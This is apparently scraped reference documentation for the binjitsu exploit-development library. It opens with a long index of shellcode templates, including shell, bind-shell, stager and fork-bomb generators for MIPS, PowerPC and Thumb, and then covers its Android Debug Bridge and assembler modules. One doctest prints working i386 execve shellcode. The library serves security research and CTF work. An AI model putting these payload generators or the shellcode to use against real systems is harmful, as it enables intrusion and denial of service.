mips.android.mkdirat mips.android.mknod mips.android.mknodat mips.android.mlock mips.android.mlockall mips.android.mmap mips.android.mprotect mips.android.mq_notify mips.android.mq_open mips.android.mq_timedreceive mips.android.mq_timedsend mips.android.mq_unlink mips.android.mremap mips.android.msync mips.android.munlock mips.android.munlockall mips.android.munmap mips.android.nanosleep mips.android.nice mips.android.open mips.android.openat mips.android.pause mips.android.pipe mips.android.pipe2 mips.android.poll mips.android.ppoll mips.android.prctl mips.android.pread mips.android.preadv mips.android.prlimit64 mips.android.profil mips.android.ptrace mips.android.putpmsg mips.android.pwrite mips.android.pwritev mips.android.read mips.android.readahead mips.android.readdir mips.android.readlink mips.android.readlinkat mips.android.readv mips.android.recv mips.android.recvfrom mips.android.recvmmsg mips.android.recvmsg mips.android.remap_file_pages mips.android.rename mips.android.renameat mips.android.rmdir mips.android.sched_get_priority_max mips.android.sched_get_priority_min mips.android.sched_getaffinity mips.android.sched_getparam mips.android.sched_getscheduler mips.android.sched_rr_get_interval mips.android.sched_setaffinity mips.android.sched_setparam mips.android.sched_setscheduler mips.android.sched_yield mips.android.select mips.android.sendfile mips.android.sendfile64 mips.android.setdomainname mips.android.setgid mips.android.setgroups mips.android.sethostname mips.android.setitimer mips.android.setpgid mips.android.setpriority mips.android.setregid mips.android.setresgid mips.android.setresuid mips.android.setreuid mips.android.setrlimit mips.android.setsid mips.android.settimeofday mips.android.setuid mips.android.sh mips.android.sigaction mips.android.sigaltstack mips.android.signal mips.android.sigpending mips.android.sigprocmask mips.android.sigreturn mips.android.sigsuspend mips.android.splice mips.android.stat mips.android.stat64 mips.android.stime mips.android.stty mips.android.symlink mips.android.symlinkat mips.android.sync mips.android.sync_file_range mips.android.syscall mips.android.syslog mips.android.tee mips.android.time mips.android.timer_create mips.android.timer_delete mips.android.timer_getoverrun mips.android.timer_gettime mips.android.timer_settime mips.android.truncate mips.android.truncate64 mips.android.ulimit mips.android.umask mips.android.uname mips.android.unlink mips.android.unlinkat mips.android.unshare mips.android.ustat mips.android.utime mips.android.utimensat mips.android.utimes mips.android.vfork mips.android.vhangup mips.android.vmsplice mips.android.wait4 mips.android.waitid mips.android.waitpid mips.android.write mips.android.writev mips.linux.accept mips.linux.access mips.linux.acct mips.linux.alarm mips.linux.bind mips.linux.bindsh mips.linux.brk mips.linux.cat mips.linux.chdir mips.linux.chmod mips.linux.chown mips.linux.chroot mips.linux.clock_getres mips.linux.clock_gettime mips.linux.clock_nanosleep mips.linux.clock_settime mips.linux.clone mips.linux.close mips.linux.connect mips.linux.creat mips.linux.dup mips.linux.dup2 mips.linux.dup3 mips.linux.dupsh mips.linux.echo mips.linux.epoll_create mips.linux.epoll_create1 mips.linux.epoll_ctl mips.linux.epoll_pwait mips.linux.epoll_wait mips.linux.execve mips.linux.exit mips.linux.faccessat mips.linux.fallocate mips.linux.fchdir mips.linux.fchmod mips.linux.fchmodat mips.linux.fchown mips.linux.fchownat mips.linux.fcntl mips.linux.fdatasync mips.linux.findpeer mips.linux.findpeersh mips.linux.flock mips.linux.fork mips.linux.forkbomb mips.linux.forkexit mips.linux.fstat mips.linux.fstat64 mips.linux.fstatat64 mips.linux.fsync mips.linux.ftruncate mips.linux.ftruncate64 mips.linux.futimesat mips.linux.getcwd mips.linux.getegid mips.linux.geteuid mips.linux.getgid mips.linux.getgroups mips.linux.getitimer mips.linux.getpeername mips.linux.getpgid mips.linux.getpgrp mips.linux.getpid mips.linux.getpmsg mips.linux.getppid mips.linux.getpriority mips.linux.getresgid mips.linux.getresuid mips.linux.getrlimit mips.linux.getrusage mips.linux.getsid mips.linux.getsockname mips.linux.getsockopt mips.linux.gettimeofday mips.linux.getuid mips.linux.gtty mips.linux.ioctl mips.linux.ioperm mips.linux.iopl mips.linux.kill mips.linux.killparent mips.linux.lchown mips.linux.link mips.linux.linkat mips.linux.listen mips.linux.lseek mips.linux.lstat mips.linux.lstat64 mips.linux.madvise mips.linux.mincore mips.linux.mkdir mips.linux.mkdirat mips.linux.mknod mips.linux.mknodat mips.linux.mlock mips.linux.mlockall mips.linux.mmap mips.linux.mov mips.linux.mprotect mips.linux.mq_notify mips.linux.mq_open mips.linux.mq_timedreceive mips.linux.mq_timedsend mips.linux.mq_unlink mips.linux.mremap mips.linux.msync mips.linux.munlock mips.linux.munlockall mips.linux.munmap mips.linux.nanosleep mips.linux.nice mips.linux.open mips.linux.openat mips.linux.pause mips.linux.pipe mips.linux.pipe2 mips.linux.poll mips.linux.ppoll mips.linux.prctl mips.linux.pread mips.linux.preadv mips.linux.prlimit64 mips.linux.profil mips.linux.ptrace mips.linux.pushstr mips.linux.putpmsg mips.linux.pwrite mips.linux.pwritev mips.linux.read mips.linux.readahead mips.linux.readdir mips.linux.readfile mips.linux.readlink mips.linux.readlinkat mips.linux.readv mips.linux.recv mips.linux.recvfrom mips.linux.recvmmsg mips.linux.recvmsg mips.linux.remap_file_pages mips.linux.rename mips.linux.renameat mips.linux.rmdir mips.linux.sched_get_priority_max mips.linux.sched_get_priority_min mips.linux.sched_getaffinity mips.linux.sched_getparam mips.linux.sched_getscheduler mips.linux.sched_rr_get_interval mips.linux.sched_setaffinity mips.linux.sched_setparam mips.linux.sched_setscheduler mips.linux.sched_yield mips.linux.select mips.linux.sendfile mips.linux.sendfile64 mips.linux.setdomainname mips.linux.setgid mips.linux.setgroups mips.linux.sethostname mips.linux.setitimer mips.linux.setpgid mips.linux.setpriority mips.linux.setregid mips.linux.setresgid mips.linux.setresuid mips.linux.setreuid mips.linux.setrlimit mips.linux.setsid mips.linux.settimeofday mips.linux.setuid mips.linux.sh mips.linux.sigaction mips.linux.sigaltstack mips.linux.signal mips.linux.sigpending mips.linux.sigprocmask mips.linux.sigreturn mips.linux.sigsuspend mips.linux.splice mips.linux.stager mips.linux.stat mips.linux.stat64 mips.linux.stime mips.linux.stty mips.linux.symlink mips.linux.symlinkat mips.linux.sync mips.linux.sync_file_range mips.linux.syscall mips.linux.syslog mips.linux.tee mips.linux.time mips.linux.timer_create mips.linux.timer_delete mips.linux.timer_getoverrun mips.linux.timer_gettime mips.linux.timer_settime mips.linux.truncate mips.linux.truncate64 mips.linux.ulimit mips.linux.umask mips.linux.uname mips.linux.unlink mips.linux.unlinkat mips.linux.unshare mips.linux.ustat mips.linux.utime mips.linux.utimensat mips.linux.utimes mips.linux.vfork mips.linux.vhangup mips.linux.vmsplice mips.linux.wait4 mips.linux.waitid mips.linux.waitpid mips.linux.write mips.linux.writev mips.mov mips.nop mips.push mips.pushstr mips.setregs mips.trap powerpc.android.accept powerpc.android.access powerpc.android.acct powerpc.android.alarm powerpc.android.bind powerpc.android.brk powerpc.android.chdir powerpc.android.chmod powerpc.android.chown powerpc.android.chroot powerpc.android.clock_getres powerpc.android.clock_gettime powerpc.android.clock_nanosleep powerpc.android.clock_settime powerpc.android.clone powerpc.android.close powerpc.android.connect powerpc.android.creat powerpc.android.dup powerpc.android.dup2 powerpc.android.dup3 powerpc.android.epoll_create powerpc.android.epoll_create1 powerpc.android.epoll_ctl powerpc.android.epoll_pwait powerpc.android.epoll_wait powerpc.android.execve powerpc.android.exit powerpc.android.faccessat powerpc.android.fallocate powerpc.android.fchdir powerpc.android.fchmod powerpc.android.fchmodat powerpc.android.fchown powerpc.android.fchownat powerpc.android.fcntl powerpc.android.fdatasync powerpc.android.flock powerpc.android.fork powerpc.android.fstat powerpc.android.fstat64 powerpc.android.fstatat64 powerpc.android.fsync powerpc.android.ftruncate powerpc.android.ftruncate64 powerpc.android.futimesat powerpc.android.getcwd powerpc.android.getegid powerpc.android.geteuid powerpc.android.getgid powerpc.android.getgroups powerpc.android.getitimer powerpc.android.getpeername powerpc.android.getpgid powerpc.android.getpgrp powerpc.android.getpid powerpc.android.getpmsg powerpc.android.getppid powerpc.android.getpriority powerpc.android.getresgid powerpc.android.getresuid powerpc.android.getrlimit powerpc.android.getrusage powerpc.android.getsid powerpc.android.getsockname powerpc.android.getsockopt powerpc.android.gettimeofday powerpc.android.getuid powerpc.android.gtty powerpc.android.ioctl powerpc.android.ioperm powerpc.android.iopl powerpc.android.kill powerpc.android.lchown powerpc.android.link powerpc.android.linkat powerpc.android.listen powerpc.android.lseek powerpc.android.lstat powerpc.android.lstat64 powerpc.android.madvise powerpc.android.mincore powerpc.android.mkdir powerpc.android.mkdirat powerpc.android.mknod powerpc.android.mknodat powerpc.android.mlock powerpc.android.mlockall powerpc.android.mmap powerpc.android.mprotect powerpc.android.mq_notify powerpc.android.mq_open powerpc.android.mq_timedreceive powerpc.android.mq_timedsend powerpc.android.mq_unlink powerpc.android.mremap powerpc.android.msync powerpc.android.munlock powerpc.android.munlockall powerpc.android.munmap powerpc.android.nanosleep powerpc.android.nice powerpc.android.open powerpc.android.openat powerpc.android.pause powerpc.android.pipe powerpc.android.pipe2 powerpc.android.poll powerpc.android.ppoll powerpc.android.prctl powerpc.android.pread powerpc.android.preadv powerpc.android.prlimit64 powerpc.android.profil powerpc.android.ptrace powerpc.android.putpmsg powerpc.android.pwrite powerpc.android.pwritev powerpc.android.read powerpc.android.readahead powerpc.android.readdir powerpc.android.readlink powerpc.android.readlinkat powerpc.android.readv powerpc.android.recv powerpc.android.recvfrom powerpc.android.recvmmsg powerpc.android.recvmsg powerpc.android.remap_file_pages powerpc.android.rename powerpc.android.renameat powerpc.android.rmdir powerpc.android.sched_get_priority_max powerpc.android.sched_get_priority_min powerpc.android.sched_getaffinity powerpc.android.sched_getparam powerpc.android.sched_getscheduler powerpc.android.sched_rr_get_interval powerpc.android.sched_setaffinity powerpc.android.sched_setparam powerpc.android.sched_setscheduler powerpc.android.sched_yield powerpc.android.select powerpc.android.sendfile powerpc.android.sendfile64 powerpc.android.setdomainname powerpc.android.setgid powerpc.android.setgroups powerpc.android.sethostname powerpc.android.setitimer powerpc.android.setpgid powerpc.android.setpriority powerpc.android.setregid powerpc.android.setresgid powerpc.android.setresuid powerpc.android.setreuid powerpc.android.setrlimit powerpc.android.setsid powerpc.android.settimeofday powerpc.android.setuid powerpc.android.sigaction powerpc.android.sigaltstack powerpc.android.signal powerpc.android.sigpending powerpc.android.sigprocmask powerpc.android.sigreturn powerpc.android.sigsuspend powerpc.android.splice powerpc.android.stat powerpc.android.stat64 powerpc.android.stime powerpc.android.stty powerpc.android.symlink powerpc.android.symlinkat powerpc.android.sync powerpc.android.sync_file_range powerpc.android.syslog powerpc.android.tee powerpc.android.time powerpc.android.timer_create powerpc.android.timer_delete powerpc.android.timer_getoverrun powerpc.android.timer_gettime powerpc.android.timer_settime powerpc.android.truncate powerpc.android.truncate64 powerpc.android.ulimit powerpc.android.umask powerpc.android.uname powerpc.android.unlink powerpc.android.unlinkat powerpc.android.unshare powerpc.android.ustat powerpc.android.utime powerpc.android.utimensat powerpc.android.utimes powerpc.android.vfork powerpc.android.vhangup powerpc.android.vmsplice powerpc.android.wait4 powerpc.android.waitid powerpc.android.waitpid powerpc.android.write powerpc.android.writev powerpc.linux.accept powerpc.linux.access powerpc.linux.acct powerpc.linux.alarm powerpc.linux.bind powerpc.linux.brk powerpc.linux.chdir powerpc.linux.chmod powerpc.linux.chown powerpc.linux.chroot powerpc.linux.clock_getres powerpc.linux.clock_gettime powerpc.linux.clock_nanosleep powerpc.linux.clock_settime powerpc.linux.clone powerpc.linux.close powerpc.linux.connect powerpc.linux.creat powerpc.linux.dup powerpc.linux.dup2 powerpc.linux.dup3 powerpc.linux.epoll_create powerpc.linux.epoll_create1 powerpc.linux.epoll_ctl powerpc.linux.epoll_pwait powerpc.linux.epoll_wait powerpc.linux.execve powerpc.linux.exit powerpc.linux.faccessat powerpc.linux.fallocate powerpc.linux.fchdir powerpc.linux.fchmod powerpc.linux.fchmodat powerpc.linux.fchown powerpc.linux.fchownat powerpc.linux.fcntl powerpc.linux.fdatasync powerpc.linux.flock powerpc.linux.fork powerpc.linux.fstat powerpc.linux.fstat64 powerpc.linux.fstatat64 powerpc.linux.fsync powerpc.linux.ftruncate powerpc.linux.ftruncate64 powerpc.linux.futimesat powerpc.linux.getcwd powerpc.linux.getegid powerpc.linux.geteuid powerpc.linux.getgid powerpc.linux.getgroups powerpc.linux.getitimer powerpc.linux.getpeername powerpc.linux.getpgid powerpc.linux.getpgrp powerpc.linux.getpid powerpc.linux.getpmsg powerpc.linux.getppid powerpc.linux.getpriority powerpc.linux.getresgid powerpc.linux.getresuid powerpc.linux.getrlimit powerpc.linux.getrusage powerpc.linux.getsid powerpc.linux.getsockname powerpc.linux.getsockopt powerpc.linux.gettimeofday powerpc.linux.getuid powerpc.linux.gtty powerpc.linux.ioctl powerpc.linux.ioperm powerpc.linux.iopl powerpc.linux.kill powerpc.linux.lchown powerpc.linux.link powerpc.linux.linkat powerpc.linux.listen powerpc.linux.lseek powerpc.linux.lstat powerpc.linux.lstat64 powerpc.linux.madvise powerpc.linux.mincore powerpc.linux.mkdir powerpc.linux.mkdirat powerpc.linux.mknod powerpc.linux.mknodat powerpc.linux.mlock powerpc.linux.mlockall powerpc.linux.mmap powerpc.linux.mprotect powerpc.linux.mq_notify powerpc.linux.mq_open powerpc.linux.mq_timedreceive powerpc.linux.mq_timedsend powerpc.linux.mq_unlink powerpc.linux.mremap powerpc.linux.msync powerpc.linux.munlock powerpc.linux.munlockall powerpc.linux.munmap powerpc.linux.nanosleep powerpc.linux.nice powerpc.linux.open powerpc.linux.openat powerpc.linux.pause powerpc.linux.pipe powerpc.linux.pipe2 powerpc.linux.poll powerpc.linux.ppoll powerpc.linux.prctl powerpc.linux.pread powerpc.linux.preadv powerpc.linux.prlimit64 powerpc.linux.profil powerpc.linux.ptrace powerpc.linux.putpmsg powerpc.linux.pwrite powerpc.linux.pwritev powerpc.linux.read powerpc.linux.readahead powerpc.linux.readdir powerpc.linux.readlink powerpc.linux.readlinkat powerpc.linux.readv powerpc.linux.recv powerpc.linux.recvfrom powerpc.linux.recvmmsg powerpc.linux.recvmsg powerpc.linux.remap_file_pages powerpc.linux.rename powerpc.linux.renameat powerpc.linux.rmdir powerpc.linux.sched_get_priority_max powerpc.linux.sched_get_priority_min powerpc.linux.sched_getaffinity powerpc.linux.sched_getparam powerpc.linux.sched_getscheduler powerpc.linux.sched_rr_get_interval powerpc.linux.sched_setaffinity powerpc.linux.sched_setparam powerpc.linux.sched_setscheduler powerpc.linux.sched_yield powerpc.linux.select powerpc.linux.sendfile powerpc.linux.sendfile64 powerpc.linux.setdomainname powerpc.linux.setgid powerpc.linux.setgroups powerpc.linux.sethostname powerpc.linux.setitimer powerpc.linux.setpgid powerpc.linux.setpriority powerpc.linux.setregid powerpc.linux.setresgid powerpc.linux.setresuid powerpc.linux.setreuid powerpc.linux.setrlimit powerpc.linux.setsid powerpc.linux.settimeofday powerpc.linux.setuid powerpc.linux.sigaction powerpc.linux.sigaltstack powerpc.linux.signal powerpc.linux.sigpending powerpc.linux.sigprocmask powerpc.linux.sigreturn powerpc.linux.sigsuspend powerpc.linux.splice powerpc.linux.stat powerpc.linux.stat64 powerpc.linux.stime powerpc.linux.stty powerpc.linux.symlink powerpc.linux.symlinkat powerpc.linux.sync powerpc.linux.sync_file_range powerpc.linux.syslog powerpc.linux.tee powerpc.linux.time powerpc.linux.timer_create powerpc.linux.timer_delete powerpc.linux.timer_getoverrun powerpc.linux.timer_gettime powerpc.linux.timer_settime powerpc.linux.truncate powerpc.linux.truncate64 powerpc.linux.ulimit powerpc.linux.umask powerpc.linux.uname powerpc.linux.unlink powerpc.linux.unlinkat powerpc.linux.unshare powerpc.linux.ustat powerpc.linux.utime powerpc.linux.utimensat powerpc.linux.utimes powerpc.linux.vfork powerpc.linux.vhangup powerpc.linux.vmsplice powerpc.linux.wait4 powerpc.linux.waitid powerpc.linux.waitpid powerpc.linux.write powerpc.linux.writev thumb.android.accept thumb.android.access thumb.android.acct thumb.android.alarm thumb.android.bind thumb.android.bindsh thumb.android.brk thumb.android.cat thumb.android.chdir thumb.android.chmod thumb.android.chown thumb.android.chroot thumb.android.clock_getres thumb.android.clock_gettime thumb.android.clock_nanosleep thumb.android.clock_settime thumb.android.clone thumb.android.close thumb.android.connect thumb.android.creat thumb.android.dup thumb.android.dup2 thumb.android.dup3 thumb.android.dupsh thumb.android.echo thumb.android.epoll_create thumb.android.epoll_create1 thumb.android.epoll_ctl thumb.android.epoll_pwait thumb.android.epoll_wait thumb.android.execve thumb.android.exit thumb.android.faccessat thumb.android.fallocate thumb.android.fchdir thumb.android.fchmod thumb.android.fchmodat thumb.android.fchown thumb.android.fchownat thumb.android.fcntl thumb.android.fdatasync thumb.android.findpeer thumb.android.findpeersh thumb.android.flock thumb.android.fork thumb.android.forkbomb thumb.android.forkexit thumb.android.fstat thumb.android.fstat64 thumb.android.fstatat64 thumb.android.fsync thumb.android.ftruncate thumb.android.ftruncate64 thumb.android.futimesat thumb.android.getcwd thumb.android.getegid thumb.android.geteuid thumb.android.getgid thumb.android.getgroups thumb.android.getitimer thumb.android.getpeername thumb.android.getpgid thumb.android.getpgrp thumb.android.getpid thumb.android.getpmsg thumb.android.getppid thumb.android.getpriority thumb.android.getresgid thumb.android.getresuid thumb.android.getrlimit thumb.android.getrusage thumb.android.getsid thumb.android.getsockname thumb.android.getsockopt thumb.android.gettimeofday thumb.android.getuid thumb.android.gtty thumb.android.ioctl thumb.android.ioperm thumb.android.iopl thumb.android.kill thumb.android.killparent thumb.android.lchown thumb.android.link thumb.android.linkat thumb.android.listen thumb.android.loader thumb.android.loader_append thumb.android.lseek thumb.android.lstat thumb.android.lstat64 thumb.android.madvise thumb.android.mincore thumb.android.mkdir thumb.android.mkdirat thumb.android.mknod thumb.android.mknodat thumb.android.mlock thumb.android.mlockall thumb.android.mmap thumb.android.mov thumb.android.mprotect thumb.android.mq_notify thumb.android.mq_open thumb.android.mq_timedreceive thumb.android.mq_timedsend thumb.android.mq_unlink thumb.android.mremap thumb.android.msync thumb.android.munlock thumb.android.munlockall thumb.android.munmap thumb.android.nanosleep thumb.android.nice thumb.android.open thumb.android.openat thumb.android.pause thumb.android.pipe thumb.android.pipe2 thumb.android.poll thumb.android.ppoll thumb.android.prctl thumb.android.pread thumb.android.preadv thumb.android.prlimit64 thumb.android.profil thumb.android.ptrace thumb.android.push thumb.android.putpmsg thumb.android.pwrite thumb.android.pwritev thumb.android.read thumb.android.readahead thumb.android.readdir thumb.android.readlink thumb.android.readlinkat thumb.android.readn thumb.android.readv thumb.android.recv thumb.android.recvfrom thumb.android.recvmmsg thumb.android.recvmsg thumb.android.remap_file_pages thumb.android.rename thumb.android.renameat thumb.android.rmdir thumb.android.sched_get_priority_max thumb.android.sched_get_priority_min thumb.android.sched_getaffinity thumb.android.sched_getparam thumb.android.sched_getscheduler thumb.android.sched_rr_get_interval thumb.android.sched_setaffinity thumb.android.sched_setparam thumb.android.sched_setscheduler thumb.android.sched_yield thumb.android.select thumb.android.sendfile thumb.android.sendfile64 thumb.android.setdomainname thumb.android.setgid thumb.android.setgroups thumb.android.sethostname thumb.android.setitimer thumb.android.setpgid thumb.android.setpriority thumb.android.setregid thumb.android.setresgid thumb.android.setresuid thumb.android.setreuid thumb.android.setrlimit thumb.android.setsid thumb.android.settimeofday thumb.android.setuid thumb.android.sh thumb.android.sigaction thumb.android.sigaltstack thumb.android.signal thumb.android.sigpending thumb.android.sigprocmask thumb.android.sigreturn thumb.android.sigsuspend thumb.android.splice thumb.android.stage thumb.android.stager thumb.android.stat thumb.android.stat64 thumb.android.stime thumb.android.stty thumb.android.symlink thumb.android.symlinkat thumb.android.sync thumb.android.sync_file_range thumb.android.syscall thumb.android.syslog thumb.android.tee thumb.android.time thumb.android.timer_create thumb.android.timer_delete thumb.android.timer_getoverrun thumb.android.timer_gettime thumb.android.timer_settime thumb.android.truncate thumb.android.truncate64 thumb.android.ulimit thumb.android.umask thumb.android.uname thumb.android.unlink thumb.android.unlinkat thumb.android.unshare thumb.android.ustat thumb.android.utime thumb.android.utimensat thumb.android.utimes thumb.android.vfork thumb.android.vhangup thumb.android.vmsplice thumb.android.wait4 thumb.android.waitid thumb.android.waitpid thumb.android.write thumb.android.writev thumb.crash thumb.infloop thumb.itoa thumb.linux.accept thumb.linux.access thumb.linux.acct thumb.linux.alarm thumb.linux.bind thumb.linux.bindsh thumb.linux.brk thumb.linux.cat thumb.linux.chdir thumb.linux.chmod thumb.linux.chown thumb.linux.chroot thumb.linux.clock_getres thumb.linux.clock_gettime thumb.linux.clock_nanosleep thumb.linux.clock_settime thumb.linux.clone thumb.linux.close thumb.linux.connect thumb.linux.connectstager thumb.linux.creat thumb.linux.dup thumb.linux.dup2 thumb.linux.dup3 thumb.linux.dupsh thumb.linux.echo thumb.linux.epoll_create thumb.linux.epoll_create1 thumb.linux.epoll_ctl thumb.linux.epoll_pwait thumb.linux.epoll_wait thumb.linux.execve thumb.linux.exit thumb.linux.faccessat thumb.linux.fallocate thumb.linux.fchdir thumb.linux.fchmod thumb.linux.fchmodat thumb.linux.fchown thumb.linux.fchownat thumb.linux.fcntl thumb.linux.fdatasync thumb.linux.findpeer thumb.linux.findpeersh thumb.linux.findpeerstager thumb.linux.flock thumb.linux.fork thumb.linux.forkbomb thumb.linux.forkexit thumb.linux.fstat thumb.linux.fstat64 thumb.linux.fstatat64 thumb.linux.fsync thumb.linux.ftruncate thumb.linux.ftruncate64 thumb.linux.futimesat thumb.linux.getcwd thumb.linux.getegid thumb.linux.geteuid thumb.linux.getgid thumb.linux.getgroups thumb.linux.getitimer thumb.linux.getpeername thumb.linux.getpgid thumb.linux.getpgrp thumb.linux.getpid thumb.linux.getpmsg thumb.linux.getppid thumb.linux.getpriority thumb.linux.getresgid thumb.linux.getresuid thumb.linux.getrlimit thumb.linux.getrusage thumb.linux.getsid thumb.linux.getsockname thumb.linux.getsockopt thumb.linux.gettimeofday thumb.linux.getuid thumb.linux.gtty thumb.linux.ioctl thumb.linux.ioperm thumb.linux.iopl thumb.linux.kill thumb.linux.killparent thumb.linux.lchown thumb.linux.link thumb.linux.linkat thumb.linux.listen thumb.linux.loader thumb.linux.loader_append thumb.linux.lseek thumb.linux.lstat thumb.linux.lstat64 thumb.linux.madvise thumb.linux.mincore thumb.linux.mkdir thumb.linux.mkdirat thumb.linux.mknod thumb.linux.mknodat thumb.linux.mlock thumb.linux.mlockall thumb.linux.mmap thumb.linux.mov thumb.linux.mprotect thumb.linux.mq_notify thumb.linux.mq_open thumb.linux.mq_timedreceive thumb.linux.mq_timedsend thumb.linux.mq_unlink thumb.linux.mremap thumb.linux.msync thumb.linux.munlock thumb.linux.munlockall thumb.linux.munmap thumb.linux.nanosleep thumb.linux.nice thumb.linux.open thumb.linux.openat thumb.linux.pause thumb.linux.pipe thumb.linux.pipe2 thumb.linux.poll thumb.linux.ppoll thumb.linux.prctl thumb.linux.pread thumb.linux.preadv thumb.linux.prlimit64 thumb.linux.profil thumb.linux.ptrace thumb.linux.push thumb.linux.putpmsg thumb.linux.pwrite thumb.linux.pwritev thumb.linux.read thumb.linux.readahead thumb.linux.readdir thumb.linux.readfile thumb.linux.readlink thumb.linux.readlinkat thumb.linux.readn thumb.linux.readv thumb.linux.recv thumb.linux.recvfrom thumb.linux.recvmmsg thumb.linux.recvmsg thumb.linux.recvsize thumb.linux.remap_file_pages thumb.linux.rename thumb.linux.renameat thumb.linux.rmdir thumb.linux.sched_get_priority_max thumb.linux.sched_get_priority_min thumb.linux.sched_getaffinity thumb.linux.sched_getparam thumb.linux.sched_getscheduler thumb.linux.sched_rr_get_interval thumb.linux.sched_setaffinity thumb.linux.sched_setparam thumb.linux.sched_setscheduler thumb.linux.sched_yield thumb.linux.select thumb.linux.sendfile thumb.linux.sendfile64 thumb.linux.setdomainname thumb.linux.setgid thumb.linux.setgroups thumb.linux.sethostname thumb.linux.setitimer thumb.linux.setpgid thumb.linux.setpriority thumb.linux.setregid thumb.linux.setresgid thumb.linux.setresuid thumb.linux.setreuid thumb.linux.setrlimit thumb.linux.setsid thumb.linux.settimeofday thumb.linux.setuid thumb.linux.sh thumb.linux.sigaction thumb.linux.sigaltstack thumb.linux.signal thumb.linux.sigpending thumb.linux.sigprocmask thumb.linux.sigreturn thumb.linux.sigsuspend thumb.linux.splice thumb.linux.stage thumb.linux.stager thumb.linux.stat thumb.linux.stat64 thumb.linux.stime thumb.linux.stty thumb.linux.symlink thumb.linux.symlinkat thumb.linux.sync thumb.linux.sync_file_range thumb.linux.syscall thumb.linux.syslog thumb.linux.tee thumb.linux.time thumb.linux.timer_create thumb.linux.timer_delete thumb.linux.timer_getoverrun thumb.linux.timer_gettime thumb.linux.timer_settime thumb.linux.truncate thumb.linux.truncate64 thumb.linux.ulimit thumb.linux.umask thumb.linux.uname thumb.linux.unlink thumb.linux.unlinkat thumb.linux.unshare thumb.linux.ustat thumb.linux.utime thumb.linux.utimensat thumb.linux.utimes thumb.linux.vfork thumb.linux.vhangup thumb.linux.vmsplice thumb.linux.wait4 thumb.linux.waitid thumb.linux.waitpid thumb.linux.write thumb.linux.writev thumb.memcpy thumb.mov thumb.nop thumb.popad thumb.push thumb.pushad thumb.pushstr thumb.pushstr_array thumb.ret thumb.setregs thumb.to_arm thumb.trap thumb.udiv_10
Module Index¶
Each of the binjitsu
modules is documented here.
pwnlib.adb
— Android Debug Bridge¶
Provides utilities for interacting with Android devices via the Android Debug Bridge.
-
class
pwnlib.adb.
AdbDevice
(serial, type, port, product='unknown', model='unknown', device='unknown')[source]¶ Encapsulates information about a connected device.
-
pwnlib.adb.
devices
(*a, **kw)[source]¶ Returns a list of
Device
objects corresponding to the connected devices.
-
pwnlib.adb.
fastboot
(args, *a, **kw)[source]¶ Executes a fastboot command.
Returns: The command output.
-
pwnlib.adb.
find_ndk_project_root
(source)[source]¶ Given a directory path, find the topmost project root.
tl;dr “foo/bar/jni/baz.cpp” ==> “foo/bar”
-
pwnlib.adb.
getprop
(name=None)[source]¶ Reads a properties from the system property store.
Parameters: name (str) – Optional, read a single property. Returns: If name
is not specified, adict
of all properties is returned. Otherwise, a string is returned with the contents of the named property.
-
pwnlib.adb.
listdir
(directory='/')[source]¶ Returns a list containing the entries in the provided directory.
Note
Because
adb shell
is used to retrieve the listing, shell environment variable expansion and globbing are in effect.
-
pwnlib.adb.
logcat
(*a, **kw)[source]¶ Reads the system log file.
By default, causes logcat to exit after reading the file.
Parameters: stream (bool) – If True
, the contents are streamed rather than read in a one-shot manner. Default isFalse
.Returns: If stream
isFalse
, returns a string containing the log data. Otherwise, it returns atube
connected to the log output.
-
pwnlib.adb.
process
(argv, *a, **kw)[source]¶ Execute a process on the device.
See
pwnlib.tubes.process.process
documentation for more info.Returns: A process
tube.
-
pwnlib.adb.
read
(*a, **kw)[source]¶ Download a file from the device, and extract its contents.
Parameters:
pwnlib.asm
— Assembler functions¶
Utilities for assembling and disassembling code.
Architecture Selection¶
Assembly¶
To assemble code, simply invoke
asm()
on the code to assemble.>>> asm('mov eax, 0') '\xb8\x00\x00\x00\x00'Additionally, you can use constants as defined in the
pwnlib.constants
module.>>> asm('mov eax, SYS_execve') '\xb8\x0b\x00\x00\x00'Finally,
asm()
is used to assemble shellcode provided bybinjitsu
in theshellcraft
module.>>> asm(shellcraft.sh()) 'jhh///sh/binj\x0bX\x89\xe31\xc9\x99\xcd\x80'
Disassembly¶
To disassemble code, simply invoke
disasm()
on the bytes to disassemble.>>> disasm('\xb8\x0b\x00\x00\x00') ' 0: b8 0b 00 00 00 mov eax,0xb'
-
pwnlib.asm.
asm
(code, vma = 0, extract = True, ...) → str[source]¶ Runs
cpp()
over a given shellcode and then assembles it into bytes.To see which architectures or operating systems are supported, look in
pwnlib.contex
.To support all these architecture, we bundle the GNU assembler and objcopy with binjitsu.
Parameters: - Kwargs:
- Any arguments/properties that can be set on
context
Examples
>>> asm("mov eax, SYS_select", arch = 'i386', os = 'freebsd') '\xb8]\x00\x00\x00' >>> asm("mov eax, SYS_select", arch = 'amd64', os = 'linux') '\xb8\x17\x00\x00\x00' >>> asm("mov rax, SYS_select", arch = 'amd64', os = 'linux') 'H\xc7\xc0\x17\x00\x00\x00' >>> asm("mov r0, #SYS_select", arch = 'arm', os = 'linux', bits=32) 'R\x00\xa0\xe3'
-
pwnlib.asm.
cpp
(shellcode, ...) → str[source]¶ Runs CPP over the given shellcode.
The output will always contain exactly one newline at the end.
Parameters: shellcode (str) – Shellcode to preprocess - Kwargs:
- Any arguments/properties that can be set on
context
Examples
>>> cpp("mov al, SYS_setresuid", arch = "i386", os = "linux") 'mov al, 164\n' >>> cpp("weee SYS_setresuid", arch = "arm", os = "linux") 'weee (0+164)\n' >>> cpp("SYS_setresuid", arch = "thumb", os = "linux") '(0+164)\n' >>> cpp("SYS_setresuid", os = "freebsd") '311\n'
-
pwnlib.asm.
disasm
(data, ...) → str[source]¶ Disassembles a bytestring into human readable assembler.
To see which architectures are supported, look in
pwnlib.contex
.To support all these architecture, we bundle the GNU objcopy and objdump with binjitsu.
Parameters: - Kwargs:
- Any arguments/properties that can be set on
context
Examples
